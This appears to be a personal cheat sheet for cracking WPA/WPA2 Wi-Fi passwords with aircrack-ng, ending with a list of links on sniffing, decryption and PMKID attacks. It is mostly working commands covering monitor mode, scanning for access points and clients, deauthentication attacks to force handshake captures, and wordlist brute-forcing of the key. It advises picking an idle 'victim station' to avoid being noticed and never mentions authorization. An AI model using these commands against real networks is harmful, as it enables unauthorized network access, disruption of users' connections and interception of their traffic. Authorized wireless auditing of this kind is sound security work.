Cracking WPA/WPA2 with Aircrack-NG

assuming you’ve got some password dictionaries ready already

see aircrack-obsolete for sniffing OPN and cracking WEP setups

Install

Ubuntu

apt install aircrack-ng wifite ieee-data
airodump-ng-oui-update

or from source

Get ready

what kind of WLAN interface do you have?

ifconfig -a
iwconfig

have a quick look at strongest available SSIDs before you proceed

ifconfig wlan0 up
iwlist wlan0 scan | grep SSID | head

check if nothing is interfering and eventually kill those

systemctl stop avahi-daemon
systemctl disable avahi-daemon

systemctl stop avahi-daemon.socket
systemctl disable avahi-daemon.socket

pkill dhclient
pkill wpa_supplicant
pkill avahi-daemon

airmon-ng check
airmon-ng check kill

Monitor mode

enter into monitor mode instead of managed mode. this is optional as the NIC will turn into a sniffer anyhow while using airodump.

you might notice that this does not make any difference on a WLAN controller

    ifconfig wlan0 promisc

the right way would rather be

    iwconfig wlan0 mode Monitor

but let’s use the dedicated airmon tool we’ve got here. I am not sure why it is changing the name of the sniffer interface.

airmon-ng start wlan0
iwconfig
ifconfig

Who’s there?

check which APs and SSIDs are there, and now look more precisely for associated stations

airodump-ng --manufacturer --uptime --wps -a wlan0mon
# --ignore-negative-one
q q

be it for WEP or for WPA/WPA2, you need to see some stations, otherwise you won’t get any WEP traffic for IVs nor hardly any WPA/WPA2 authentication handshake.

select an SSID with PSK in the AUTH col and further look at it without noise nor channel switching

#mac=AP-MAC-ADDRESS-HERE
chan=CHANNEL-HERE
ssid=SSID-HERE

also choose a victim station – preferably the one that is most idling, to avoid being noticed by the user

station=STATION-MAC-ADDRESS-HERE

Capture 4-way handshakes

    mkdir -p ~/crack/
    cd ~/crack/

    echo $chan
    echo $ssid

mkdir $ssid/
cd $ssid/
rm -f $ssid-*
airodump-ng --manufacturer --uptime --wps -a --channel $chan \
    --essid $ssid --write $ssid wlan0mon
    # --bssid $mac --write $mac wlan0mon

and wait for the notice of a captured handshake to appear at the upper-right corner

you can also check with wireshark CLI

tshark -r $ssid-01.cap ...TODO...

you may otherwise speed up the acquisition of 4-way handshakes by de-authenticating stations. a single deauth packet is usually enough – you need to wait about 3 seconds for the supplicant to re-connect.

make sure the SAME SSID variable is defined in THAT OTHER TERMINAL…

echo $ssid
echo $station

aireplay-ng -e $ssid -s $station -c $station --deauth 1 wlan0mon
# --or-- -a $mac

otherwise eventually increase the number of de-auth packets to be sent

aireplay-ng -e $ssid -s $station -c $station --deauth 20 wlan0mon
# -g 9 -R --deauth-rc 9

and in last resort, in case there’s no handshake at all being captured

aireplay-ng -e $ssid --deauth 0 wlan0mon

Brute-force WPA/WPA2 PSK

eventually on a remote server where heavy load CPU and fan noise won’t hurt you…

passlist=/usr/share/wordlists/10-million-password-list-top-1000000.txt # atom 5m14.282s
passlist=/usr/share/wordlists/rockyou.txt # ryzen 12m58,339s vs. atom 74m53.226s
echo $ssid
ls -lhF $ssid-*.cap # got several captures?
time nice aircrack-ng -w $passlist -e $ssid -a 2 $ssid-01.cap
# --or-- -b $mac

Clean-up

You’re done with capturing? Go back to station mode

airmon-ng stop wlan0mon
iwconfig
ifconfig

–or– if you didn’t use a dedicated sniffer interface

ifconfig wlan0 down
iwconfig wlan0 mode Managed
ifconfig wlan0 up

Troubles

18:37:10  Waiting for beacon frame (BSSID: xx:xx:...) on channel xx
18:37:20  No such BSSID available.

==> make sure you define the variables accordingly in that other terminal…

Resources

Tutorial: How to Crack WPA/WPA2 https://www.aircrack-ng.org/doku.php?id=cracking_wpa

Aircrack-ng https://github.com/aircrack-ng

inside SSID

sniff traffic on a private SSID? https://networkengineering.stackexchange.com/questions/24236/sniff-traffic-on-a-private-ssid

Sniffing traffic on a secured wifi connection https://security.stackexchange.com/questions/97480/sniffing-traffic-on-a-secured-wifi-connection

WLAN (IEEE 802.11) capture setup https://wiki.wireshark.org/CaptureSetup/WLAN

How to sniff 802.11 packets without going into monitor mode? https://security.stackexchange.com/questions/130716/how-to-sniff-802-11-packets-without-going-into-monitor-mode

4-way handshake

IEEE 802.11i-2004 https://en.wikipedia.org/wiki/IEEE_802.11i-2004

Capturing WPA/WPA2 Handshake [MIC/Hash Cracking Process] https://www.cyberpunk.rs/capturing-wpa-wpa2-handshake

decrypt wifi with key

How to Decrypt 802.11 https://wiki.wireshark.org/HowToDecrypt802.11

How to decrypt WPA traffic in Wireshark https://miloserdov.org/?p=2525

Wireshark WPA 4-way handshake https://superuser.com/questions/413225/wireshark-wpa-4-way-handshake

troubles

I couldn’t deauth any devices using aireplay-ng command in kali linux https://security.stackexchange.com/questions/197287/i-couldnt-deauth-any-devices-using-aireplay-ng-command-in-kali-linux

aireplay DeAuth not functioning https://forum.aircrack-ng.org/index.php?topic=853.0

Aireplay-ng deauth attack not working? https://forums.hak5.org/topic/42852-aireplay-ng-deauth-attack-not-working/

pmkid

Hacking Wifi using PMKID and Aircrack-ng https://kalitut.com/hacking-wifi-using-pmkid-and-aircrack-ng/

Cracking WPA2 Passwords Using the New PMKID Hashcat Attack https://null-byte.wonderhowto.com/how-to/hack-wi-fi-cracking-wpa2-passwords-using-new-pmkid-hashcat-attack-0189379/

no need for CH-1 patch

https://unix.stackexchange.com/questions/145192/aircrack-ng-shows-negative-channel https://forum.aircrack-ng.org/index.php?topic=1378.0 https://forum.backbox.org/software-support/aireplay-ng-ignore-negative-one/

multi-wifi?

Wifi deauthentication attacks and home security https://mjg59.dreamwidth.org/53968.html


GUIDES | LECTURES | BENCHMARKS | SMTP HEALTH